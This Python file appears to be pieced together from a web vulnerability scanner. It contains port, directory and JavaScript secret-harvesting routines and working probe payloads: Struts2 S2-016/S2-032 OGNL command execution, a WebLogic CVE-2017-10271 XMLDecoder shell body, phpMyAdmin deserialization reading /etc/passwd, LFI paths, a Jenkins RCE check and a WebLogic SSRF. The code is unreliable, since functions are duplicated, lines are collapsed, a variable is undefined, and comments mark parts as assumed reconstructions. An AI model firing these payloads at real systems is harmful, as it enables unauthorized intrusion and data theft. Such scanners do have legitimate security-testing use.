def sqli(qurl):
    global OUT
    payload = {"'", "%2527", "')", " AnD 7738=8291"}
    LFI_payload = {
        '../../../../etc/passwd|root:',
        '../../../../etc/group|root:',
        'random.php|Failed opening',
        'file://c:/windows/win.ini|drivers',
        '/proc/self/environ|USER='
    }
    try:
        # The SQLi detection loop is truncated in this excerpt; the assumed shape is:
        # append each payload to the URL, fetch it, and grep the response for DBMS
        # error signatures (DBMS_ERRORS maps a DBMS name to its error regexes).
        for p in payload:
            r = requests.get(qurl + p, headers=get_ua(), timeout=TIMEOUT)
            for dbms, regexes in DBMS_ERRORS.items():
                for regex in regexes:
                    if re.search(regex, r.text):
                        result = '{} SQLi:{}'.format(dbms, qurl)
                        OUT.append(result)
                        raise Getoutofloop
        # LFI check: replace the last path segment or parameter value with each payload
        for i in LFI_payload:
            url = ''
            lfi, pattern = i.split('|')
            if re.search(r'=\w+\.\w{3}$', qurl):
                url = re.sub(r'\w+\.\w{3}$', lfi, qurl)
            elif re.search(r'=\w+', qurl):
                url = re.sub(r'\w+$', lfi, qurl)
            r = requests.get(url, headers=get_ua(), timeout=TIMEOUT)
            if re.search(pattern, r.text, re.S):
                OUT.append('LFI: {}'.format(url))
                break
    except:
        pass
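# The two names sqli() relies on but that are defined elsewhere in the project,
# sketched here for context. These are assumptions, not the original definitions:
# Getoutofloop is only used to break out of the nested payload/regex loops, and
# DBMS_ERRORS maps a DBMS name to error signatures (the real list is much longer).
class Getoutofloop(Exception):
    pass


DBMS_ERRORS = {
    "MySQL": (r"SQL syntax.*?MySQL", r"Warning.*?mysqli?"),
    "PostgreSQL": (r"PostgreSQL.*?ERROR", r"valid PostgreSQL result"),
    "Microsoft SQL Server": (r"Driver.*? SQL[\-_ ]*Server", r"OLE DB.*? SQL Server"),
    "Oracle": (r"\bORA-\d{5}", r"Oracle error"),
}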
def reverse_domain(host):  # look up other sites hosted on the same IP
    sys.stdout.write(Bcolors.RED + "\nReverse IP Domain Check:\n" + Bcolors.ENDC)
    if iscdn(host):
        result = []
        data = {"remoteAddress": "{0}".format(host), "key": ""}
        header = get_ua()
        try:
            r = requests.post('https://domains.yougetsignal.com/domains.php',
                              headers=header,
                              data=data,
                              timeout=5,
                              verify=False)
            text = json.loads(r.text)
            domain = tldextract.extract(host)
            for i in text.get('domainArray'):
                url = i[0]
                if url != host:
                    if tldextract.extract(url).domain == domain.domain:
                        result.append(url)
                    elif re.search(r'\d+\.\d+\.\d+\.\d+', url):
                        result.append(url)
        except:
            try:
                r = requests.get(
                    'http://api.hackertarget.com/reverseiplookup/?q={}'.format(host),
                    headers=get_ua(),
                    timeout=4,
                    verify=False)
                if '<html>' not in r.text and 'No DNS A records found for' not in r.text:
                    text = r.text
                    for _ in text.split('\n'):
                        if _:
                            result.append(_)
                else:
                    result = []
            except:
                pass
        if len(result) < 20:
            if result:
                for i in result:
                    console('reverse_domain', host, i + '\n')
            else:
                console('reverse_domain', host, 'None\n')
            return result
        else:
            console('reverse_domain', host, 'The maximum number of domain names exceeded (20)\n')
            return ['The maximum number of domain names exceeded (20)']
def reverse_domain(host):  # look up other sites hosted on the same IP
    if iscdn(host):
        result = []
        data = {"remoteAddress": "{0}".format(host), "key": ""}
        header = get_ua()
        header.update({'Referer': 'https://www.yougetsignal.com/tools/web-sites-on-web-server/'})
        header.update({'origin': 'https://www.yougetsignal.com'})
        try:
            r = requests.post('https://domains.yougetsignal.com/domains.php',
                              headers=header,
                              data=data,
                              timeout=5)
            text = json.loads(r.text)
            domain = tldextract.extract(host)
            for i in text.get('domainArray'):
                url = i[0]
                if url != host:
                    if tldextract.extract(url).domain == domain.domain:
                        result.append(url)
                    elif re.search(r'\d+\.\d+\.\d+\.\d+', url):
                        result.append(url)
        except:
            try:
                r = requests.get('http://api.hackertarget.com/reverseiplookup/?q={}'.format(host),
                                 headers=get_ua(),
                                 timeout=4)
                if '<html>' not in r.text:
                    text = r.text
                    for _ in text.split('\n'):
                        if _:
                            result.append(_)
                else:
                    result = []
            except:
                pass
        return result
def check404(self, url, text):
    url = parse.urlparse(url)
    result = 0
    if url.netloc not in self.hosts:
        key = str(random.random() * 100)
        random_url = base64.b64encode(key.encode('utf-8'))
        host = url.scheme + '://' + url.netloc + '/' + random_url.decode('utf-8') + '.html'
        try:
            r = requests.get(host,
                             timeout=TIMEOUT,
                             verify=False,
                             headers=get_ua(),
                             allow_redirects=False)
            self.notstr = r.text[:10000]
            self.notlen = len(r.text)
            if r.is_redirect:
                self.goto = r.headers['Location']
            self.hosts.append(url.netloc)
        except Exception as e:
            logging.exception(e)
    else:
        result = difflib.SequenceMatcher(None, self.notstr, text).quick_ratio()
    return result
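# Illustrative helper (not part of the original code): how the ratio returned by
# check404() is meant to be consumed. The 0.8 cut-off matches the one used in
# scan() below; `scanner` stands for any object exposing check404().
def is_soft_404(scanner, url, body):
    # responses that are >= 80% similar to the random-path baseline are treated
    # as the site's custom "not found" page and skipped
    return scanner.check404(url, body[:10000]) >= 0.8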
def get_js(self, url):
    if not re.search('http://|https://', url):
        if '//' in url:
            url = 'http:' + url
        else:
            url = self.host + '/' + url
    r = requests.get(url, headers=get_ua(), timeout=TIMEOUT, verify=False)
    regex = (
        # match URLs
        r'\b(?:http:|https:)(?:[\w/\.]+)?(?:[a-zA-Z0-9_\-\.]{1,})\.(?:php|asp|ashx|jspx|aspx|jsp|json|action|html|txt|xml|do)\b',
        # match email addresses
        r'[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+(?:\.[a-zA-Z0-9_-]+)+',
        # match leaked tokens or passwords, e.g. token = xxxxxxxx or "apikey" : "xssss"
        r'\b(?:secret|secret_key|token|secret_token|auth_token|access_token|username|password|aws_access_key_id|aws_secret_access_key|secretkey|authtoken|accesstoken|access-token|authkey|client_secret|bucket|email|HEROKU_API_KEY|SF_USERNAME|PT_TOKEN|id_dsa|clientsecret|client-secret|encryption-key|pass|encryption_key|encryptionkey|secretkey|secret-key|bearer|JEKYLL_GITHUB_TOKEN|HOMEBREW_GITHUB_API_TOKEN|api_key|api_secret_key|api-key|private_key|client_key|client_id|sshkey|ssh_key|ssh-key|privatekey|DB_USERNAME|oauth_token|irc_pass|dbpasswd|xoxa-2|xoxrprivate-key|private_key|consumer_key|consumer_secret|access_token_secret|SLACK_BOT_TOKEN|slack_api_token|api_token|ConsumerKey|ConsumerSecret|SESSION_TOKEN|session_key|session_secret|slack_token|slack_secret_token|bot_access_token|passwd|api|eid|sid|api_key|apikey|userid|user_id|user-id)["\s]*(?::|=|=:|=>)["\s]*[a-z0-9A-Z]{8,64}"?',
        # match IP addresses
        r'\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b',
        # match cloud-storage leaks
        r'[\w]+\.cloudfront\.net',
        r'[\w\-.]+\.appspot\.com',
        r'[\w\-.]*s3[\w\-.]*\.?amazonaws\.com\/?[\w\-.]*',
        r'([\w\-.]*\.?digitaloceanspaces\.com\/?[\w\-.]*)',
        r'(storage\.cloud\.google\.com\/[\w\-.]+)',
        r'([\w\-.]*\.?storage.googleapis.com\/?[\w\-.]*)',
        # match (Chinese) mobile phone numbers
        r'(?:139|138|137|136|135|134|147|150|151|152|157|158|159|178|182|183|184|187|188|198|130|131|132|155|156|166|185|186|145|175|176|133|153|177|173|180|181|189|199|170|171)[0-9]{8}',
        # match domain names
        r'((?:[a-zA-Z0-9](?:[a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?\.)+(?:biz|cc|club|cn|com|co|edu|fun|group|info|ink|kim|link|live|ltd|mobi|net|online|org|pro|pub|red|ren|shop|site|store|tech|top|tv|vip|wang|wiki|work|xin|xyz|me))'
    )
    for _ in regex:
        text = re.findall(_, r.text, re.M | re.I)
        if text:
            self.result.extend(text)
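# Quick sanity check of the token-leak pattern used above (illustrative only;
# the sample string and the trimmed-down regex below are not from the original code).
if __name__ == '__main__':
    import re
    sample = 'var cfg = {"api_key": "9f86d081884c7d659a2feaa0c55ad015"};'
    token_re = r'\b(?:secret|token|password|api_key|apikey)["\s]*(?::|=|=:|=>)["\s]*[a-z0-9A-Z]{8,64}"?'
    print(re.findall(token_re, sample, re.I))  # -> ['api_key": "9f86d081884c7d659a2feaa0c55ad015"']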
def jenkins(url):
    try:
        payload = "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile"
        r = requests.get(url + payload, timeout=5, headers=get_ua())
        if 'java.lang.NullPointerException' in r.text:
            return "CVE-2018-1000861 Jenkins_rce url: {}".format(url)
    except Exception:
        pass
def scan(self, host):
    try:
        session = requests.Session()
        HEADERS = get_ua()
        HEADERS.update(COOKIE)
        session.headers.update(HEADERS)
        r = session.get(
            host,
            timeout=TIMEOUT,
            verify=False,
            allow_redirects=False,
        )
        if r.is_redirect:
            goto = r.headers['Location']
        else:
            goto = 'test'
        # Filtering logic:
        # 1. drop blocked status codes   2. drop blocked content types
        # 3. check the 302 target        4. the 302 target must not be the homepage redirect
        # 5. the response length must differ from the 404 baseline
        if (r.status_code not in BLOCK_CODE) and (
                r.headers['Content-Type'] not in BLOCK_CONTYPE) and (
                goto != self.goto) and (
                parse.urlparse(r.url).netloc not in parse.urlparse(goto).netloc) and (
                self.notlen != len(r.text)):
            text = r.text[:10000]
            title = re.search('(?<=<title>).*(?=</title>)', text)
            contype = re.sub(r'\w+/', '', str(r.headers['Content-Type']))
            contype = re.sub(';.*', '', contype)
            if contype == 'html':
                result = self.check404(host, text)
            else:
                result = 0
            if result < 0.8:
                if title is None:
                    title = 'None'
                else:
                    title = title.group()
                title = re.sub(r'\n|\t', '', title)
                urlresult = parse.urlparse(host)
                tqdm.tqdm.write(
                    bcolors.OKGREEN + "[+] " + bcolors.ENDC +
                    '{}{:^12}{:^14}\t{:^18}\t{:^8}'.format(
                        r.status_code, len(r.text), title, contype, str(r.url)))
                data = {
                    urlresult.netloc: {
                        "rsp_code": r.status_code,
                        "rsp_len": len(r.text),
                        "title": title,
                        "contype": contype,
                        "url": urlresult.path
                    }
                }
                self.outjson.append(data)
    except (socket.timeout, requests.exceptions.ConnectionError,
            requests.exceptions.Timeout):
        pass
    except Exception as e:
        logging.exception(e)
    return 'OK'
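# scan() filters on two module-level constants that are defined elsewhere in the
# project. A sketch of their assumed shape (the values below are illustrative,
# not the project's actual lists): status codes and Content-Type values that
# should never be reported as findings.
BLOCK_CODE = [301, 400, 403, 404, 500, 502, 503]
BLOCK_CONTYPE = ['image/jpeg', 'image/png', 'image/gif', 'application/javascript', 'text/css']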
def get_title(url):
    try:
        r = requests.get(url, headers=get_ua(), timeout=3, verify=False)
        r.encoding = "utf-8"
        html = etree.HTML(r.text)
        title = html.xpath('//title/text()')
        return url + ' | ' + title[0]
    except:
        pass
def put(url):
    url = url.strip('/')
    text = random.randint(100000000, 200000000)
    payload = '/{}.txt'.format(text)
    url = url + payload
    data = {'{}'.format(text): '{}'.format(text)}
    r = requests.put(url, data=data, allow_redirects=False, verify=False, headers=get_ua())
    if r.status_code == 201:
        return 'HTTP METHOD PUT url: {}'.format(url)
def check(ip, ports, apps):
    if verify(vuln, ports, apps):
        try:
            url = 'http://' + ip
            url = url + '/solr/'
            g = requests.get(url, headers=get_ua(), timeout=5, verify=False)
            if g.status_code == 200 and 'Solr Admin' in g.text and 'Dashboard' in g.text:
                return 'Apache Solr Admin leak'
        except Exception:
            pass
def weblogic_ssrf(url):
    url = url.strip('/')
    payload = r"/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:27989"
    url = url + payload
    r = requests.get(url, allow_redirects=False, verify=False, headers=get_ua())
    if 'could not connect over HTTP to server' in r.text:
        return 'Weblogic SSRF url: {}'.format(url)
def check(ip, ports, apps):
    if verify(vuln, ports, apps):
        HEADERS = get_ua()
        HEADERS.update({'Content-Type': 'text/xml'})
        url = 'http://{}:7001/wls-wsat/CoordinatorPortType'.format(ip)
        data = '''
        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
          <soapenv:Header>
            <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
              <java>
                <object class="java.lang.ProcessBuilder">
                  <array class="java.lang.String" length="3">
                    <void index="0">
                      <string>/bin/sh</string>
                    </void>
                    <void index="1">
                      <string>-c</string>
                    </void>
                    <void index="2">
                      <string>echo xss</string>
                    </void>
                  </array>
                  <void method="start"/>
                </object>
              </java>
            </work:WorkContext>
          </soapenv:Header>
          <soapenv:Body/>
        </soapenv:Envelope>
        '''
        try:
            # send the crafted SOAP body with the text/xml headers built above
            r = requests.post(url, data=data, verify=False, timeout=5, headers=HEADERS)
            text = r.text
        except Exception:
            text = ""
        if '<faultstring>java.lang.ProcessBuilder' in text or "<faultstring>0" in text:
            return 'CVE-2017-10271 Weblogic RCE {}'.format(url)
def check(ip, ports, apps):
    try:
        payload = "/scripts/setup.php"
        data = 'action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}'
        probe = get_list(ip, ports)
        for url in probe:
            r = requests.post(url + payload, data=data, timeout=5, headers=get_ua(), verify=False)
            if r.status_code == 200 and 'root' in r.text:
                return url + " Phpmyadmin Setup RCE"
    except Exception:
        pass
def st016(self):
    payload = r"/default.action?redirect:%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23f.setAccessible%28true%29%2C%23f.set%28%23_memberAccess%2Ctrue%29%2C%23a%3D@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27" + self.linux + "%27%29.getInputStream%28%29%29%7D"
    try:
        r = requests.get(self.url + payload, headers=get_ua(), allow_redirects=False)
        if str(self.random) in r.headers['Location'] and len(r.headers['Location']) < 15:
            self.result.append('Apache S2-016 Vulnerability: ' + self.url)
    except:
        pass
def st032(self):
    payload = r"/?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd={}&pp=\\A&ppp=%20&encoding=UTF-8".format(
        self.linux)
    try:
        r = requests.get(self.url + payload, headers=get_ua(), timeout=self.timeout)
        if str(self.random) in r.text and len(r.text) < 11:
            self.result.append('Apache S2-032 Vulnerability: ' + self.url)
    except:
        pass
def check(ip, ports, apps):
    result = None
    try:
        probe = get_list(ip, ports)
        for url in probe:
            r = requests.get(url, timeout=3, headers=get_ua(), verify=False)
            if 'Jenkins' in r.text:
                result = jenkins(url)
    except Exception:
        pass
    if result:
        return result
def get_title(url):
    try:
        r = requests.get(url, headers=get_ua(), timeout=3, verify=False)
        if r.status_code == 200:
            coding = chardet.detect(r.content).get('encoding')
            r.encoding = coding
            html = etree.HTML(r.text)
            title = html.xpath('//title/text()')
            return url + ' | ' + title[0]
    except:
        pass
def check(ip, ports, apps):
    result = None
    try:
        probe = get_list(ip, ports)
        for url in probe:
            payload = '/uddiexplorer/SearchPublicRegistries.jsp'
            r = requests.get(url + payload, timeout=3, headers=get_ua())
            if 'UDDI Explorer' in r.text:
                result = weblogic_ssrf(url)
    except Exception:
        pass
    if result:
        return result
def __init__(self, dbname, apps, host, title):
    self.dbname = dbname
    self.apps = apps
    self.title = title
    self.headers = get_ua()
    self.outjson = []
    self.wordlist = []
    self.host = host
    self.urls = self.get_urls(self.host)
    self.req = Requests()
    # request URLs in random order to make the scan harder to trace
    random.shuffle(self.urls)
def __init__(self):
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    requests.packages.urllib3.disable_warnings()
    self.timeout = TIMEOUT
    self.session = requests.Session()
    self.headers = get_ua()
    if COOKIE:
        self.headers.update(COOKIE)
    if SOCKS5:
        ip, port = SOCKS5
        socks.set_default_proxy(socks.SOCKS5, ip, port)
        socket.socket = socks.socksocket
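# The SOCKS5 setting consumed above is expected to be a (host, port) tuple, as
# implied by the `ip, port = SOCKS5` unpacking; the value below is a placeholder,
# not project configuration. With PySocks, replacing socket.socket routes every
# subsequent requests call through the proxy.
SOCKS5 = ('127.0.0.1', 1080)  # hypothetical local SOCKS5 proxy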
def __init__(self):
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    requests.packages.urllib3.disable_warnings()
    self.timeout = TIMEOUT
    self.session = requests.Session()
    self.headers = get_ua()
    if COOKIE == 'random':
        plain = ''.join([random.choice('0123456789') for _ in range(8)])
        md5sum = hashlib.md5()
        md5sum.update(plain.encode('utf-8'))
        md5 = md5sum.hexdigest()
        self.headers.update({'Cookie': 'SESSION=' + md5})
    else:
        self.headers.update(COOKIE)
def jsparse(self):
    out = []
    try:
        r = requests.get(self.host, headers=get_ua(), timeout=TIMEOUT, verify=False)
        html = etree.HTML(r.text)
        result = html.xpath('//script/@src')
        for i in result:
            if not re.search('jquery|bootstrap|adsbygoogle|javascript|#|vue|react', i):
                out.append(i)
        self.pool(list(set(out)))
        if result:
            return list(set(self.result))
        else:
            return ''
    except:
        return ''
def parse_html(host):
    urls = []
    global links
    try:
        exts = ['asp', 'php', 'jsp', 'do', 'aspx', 'action']
        r = requests.get(host, headers=get_ua(), timeout=3)
        tmp = html.document_fromstring(r.text)
        tmp.make_links_absolute(host)
        link = tmp.iterlinks()
        for i in link:
            i = i[2]
            ext = parse.urlparse(i)[2].split('.')[-1]
            if ext in exts:
                # links with parameters go straight into the list;
                # links without parameters are returned for a second pass
                if re.search('=', i) or re.search(r'/\?\w+=\w+', i):
                    links.append(i)
                else:
                    urls.append(i)
    except:
        pass
    return urls
parser.add_argument("-u", "--url", help='Start scanning url -u xxx.com or -u url1,url2') parser.add_argument("-f", "--file", help='read the url from the file') parser.add_argument("-t", "--threads", help='Set scan thread, default 150') parser.add_argument("-e", "--ext", help='Set scan suffix, -e php,asp') parser.add_argument("-i", "--inet", help='cidr eg. 1.1.1.1 or 1.1.1.0/24') parser.add_argument("-w", "--word", help='Read the dict from the file') parser.add_argument("--cookie", help='add a cookies') args = parser.parse_args() dirscan = DirScan(args.word, args.ext) if args.word: SKIP = False if args.cookie: COOKIE = {"Cookie": args.cookie} HEADERS = get_ua() HEADERS.update(COOKIE) if args.inet: _ = [] try: net = list(ipaddress.ip_network(args.inet).hosts()) for i in net: _.append(str(i)) dirscan.pool(_) except Exception as e: print("The task could not be carried out. {}".format(str(e))) if args.threads: try: THREADS = int(args.threads) except: print("Threads must be an int")
def start(url):
    try:
        result = 'NoWAF'
        if (not parse.urlparse(url).path) and (parse.urlparse(url).path != '/'):
            host = url.replace('http://', '').replace('https://', '').rstrip('/')
        else:
            host = url.replace('http://', '').replace('https://', '').rstrip('/')
            host = re.sub(r'/\w+', '', host)
        if ':' in host:
            host = re.sub(r':\d+', '', host)
        socket.setdefaulttimeout(1)
        ipaddr = socket.gethostbyname(host)
        address = geoip(ipaddr)
        sys.stdout.write(bcolors.RED + '-' * 100 + '\n' + bcolors.ENDC)
        sys.stdout.write(bcolors.RED + 'Host: ' + host + '\n' + bcolors.ENDC)
        sys.stdout.write(bcolors.RED + '-' * 100 + '\n' + bcolors.ENDC)
        sys.stdout.write(bcolors.RED + "GeoIP:\n" + bcolors.ENDC)
        sys.stdout.write(bcolors.OKGREEN + '[+] Address: {}\n'.format(address) + bcolors.ENDC)
        sys.stdout.write(bcolors.OKGREEN + '[+] Ipaddr: {}\n'.format(ipaddr) + bcolors.ENDC)
        r = requests.get(url, headers=get_ua(), timeout=TIMEOUT, verify=False)
    except Exception as e:
        pass
    sql = ''
    if 'r' in locals().keys():
        try:
            webinfo = (WebPage(r.url, r.content.decode('utf8'), r.headers).info())
            result = checkwaf(r.headers, r.text[:10000])
            if result == 'NoWAF':
                r = requests.get(url + '/index.php?id=1 ' + payload,
                                 headers=get_ua(),
                                 timeout=TIMEOUT,
                                 verify=False)
                result = checkwaf(r.headers, r.text[:10000])
        except Exception as e:
            webinfo = {}
            traceback.print_exc()
        if webinfo:
            sys.stdout.write(bcolors.RED + "Webinfo:\n" + bcolors.ENDC)
            sys.stdout.write(bcolors.OKGREEN + '[+] Title: {}\n'.format(webinfo.get('title')) + bcolors.ENDC)
            sys.stdout.write(bcolors.OKGREEN + '[+] Fingerprint: {}\n'.format(webinfo.get('apps')) + bcolors.ENDC)
            sys.stdout.write(bcolors.OKGREEN + '[+] Server: {}\n'.format(webinfo.get('server')) + bcolors.ENDC)
            sys.stdout.write(bcolors.OKGREEN + '[+] WAF: {}\n'.format(result) + bcolors.ENDC)
            pdns = virustotal(host)
            reverseip = reverse_domain(host)
            sys.stdout.write(bcolors.RED + "VT PDNS:\n" + bcolors.ENDC)
            sys.stdout.write(bcolors.OKGREEN + "\n".join("[+] " + str(i) for i in pdns) + "\n" + bcolors.ENDC)
            if reverseip:
                sys.stdout.write(bcolors.RED + "Reverse IP Domain Check:\n" + bcolors.ENDC)
                sys.stdout.write(bcolors.OKGREEN + "\n".join("[+] " + str(i) for i in reverseip) + "\n" + bcolors.ENDC)
            jsparse = JsParse(url).jsparse()
            sql = sql_check(url)
            webinfo.update({"pdns": pdns})
            webinfo.update({"reverseip": reverseip})
    else:
        webinfo = {}
        jsparse = ''
    if iscdn(host):
        open_port = ScanPort(url).pool()
    else:
        open_port = ['CDN:0']
    sys.stdout.write(bcolors.RED + "PortScan:\n" + bcolors.ENDC)
    for _ in open_port:
        sys.stdout.write(bcolors.OKGREEN + '[+] {}\n'.format(_) + bcolors.ENDC)
    if POC:
        vuln = Vuln(url, open_port, webinfo.get('apps')).run()
    else:
        vuln = []
    if jsparse:
        jsparse = list(map(lambda x: 'Leaks: ' + x, jsparse))
        vuln.extend(jsparse)
    if sql:
        vuln.extend(sql)
    vuln = list(filter(None, vuln))
    if not (len(vuln) == 1 and ('' in vuln)):
        sys.stdout.write(bcolors.RED + "Vuln:\n" + bcolors.ENDC)
        sys.stdout.write(bcolors.OKGREEN + "\n".join("[+] " + str(i) for i in vuln) + "\n" + bcolors.ENDC)
    url = parse.urlparse(url)
    osname = osdetect(url.netloc)
    if not osname:
        osname = 'None'
    sys.stdout.write(bcolors.RED + "OS:\n" + bcolors.ENDC)
    sys.stdout.write(bcolors.OKGREEN + '[+] {}\n'.format(osname) + bcolors.ENDC)
    data = {
        url.netloc: {
            'WAF': result,
            'Ipaddr': ipaddr,
            'Address': address,
            'Webinfo': webinfo,
            'Ports': open_port,
            'OS': osname,
            'Vuln': vuln
        }
    }
    return data, result
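# Minimal usage sketch (not from the original entry point): start() returns a
# per-host dict keyed by netloc plus the WAF verdict string, so a caller can do:
if __name__ == '__main__':
    data, waf = start('http://example.com')  # placeholder target
    print(waf)
    print(data)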